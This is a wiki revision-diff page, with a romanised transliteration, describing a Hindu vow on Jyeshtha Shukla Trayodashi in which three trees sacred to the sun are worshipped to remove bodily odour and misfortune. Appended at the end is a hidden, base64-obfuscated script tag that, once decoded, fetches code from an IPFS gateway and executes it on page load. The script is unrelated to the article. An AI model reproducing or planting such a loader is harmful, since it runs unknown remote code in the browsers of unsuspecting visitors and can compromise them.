Difference between revisions of "दुर्गन्ध दुर्भाग्यनाशन त्रयोदशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष]] की त्रयोदशी को यह व्रत होता है।
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष]] की त्रयोदशी को यह व्रत होता है।
 
*इसमें तीन वृक्षों की पूजा की जाती है, यथा—श्वेत मदार या अर्क, लाल करवीर एवं निम्ब, जो कि सूर्य के प्रिय कहे जाते हैं।
 
*इसमें तीन वृक्षों की पूजा की जाती है, यथा—श्वेत मदार या अर्क, लाल करवीर एवं निम्ब, जो कि सूर्य के प्रिय कहे जाते हैं।
 
*यह पूजा प्रति वर्ष होती है।
 
*यह पूजा प्रति वर्ष होती है।
 
*इससे शरीर की दुर्गन्धियों एवं दुर्भाग्य दूर होते हैं।<ref>हेमाद्रि व्रतखण्ड 2, 14-16</ref>
 
*इससे शरीर की दुर्गन्धियों एवं दुर्भाग्य दूर होते हैं।<ref>हेमाद्रि व्रतखण्ड 2, 14-16</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:11, 15 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshth shukl paksh ki trayodashi ko yah vrat hota hai.
  • isamean tin vrikshoan ki pooja ki jati hai, yatha—shvet madar ya ark, lal karavir evan nimb, jo ki soory ke priy kahe jate haian.
  • yah pooja prati varsh hoti hai.
  • isase sharir ki durgandhiyoan evan durbhagy door hote haian.[1]


tika tippani aur sandarbh

  1. hemadri vratakhand 2, 14-16

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>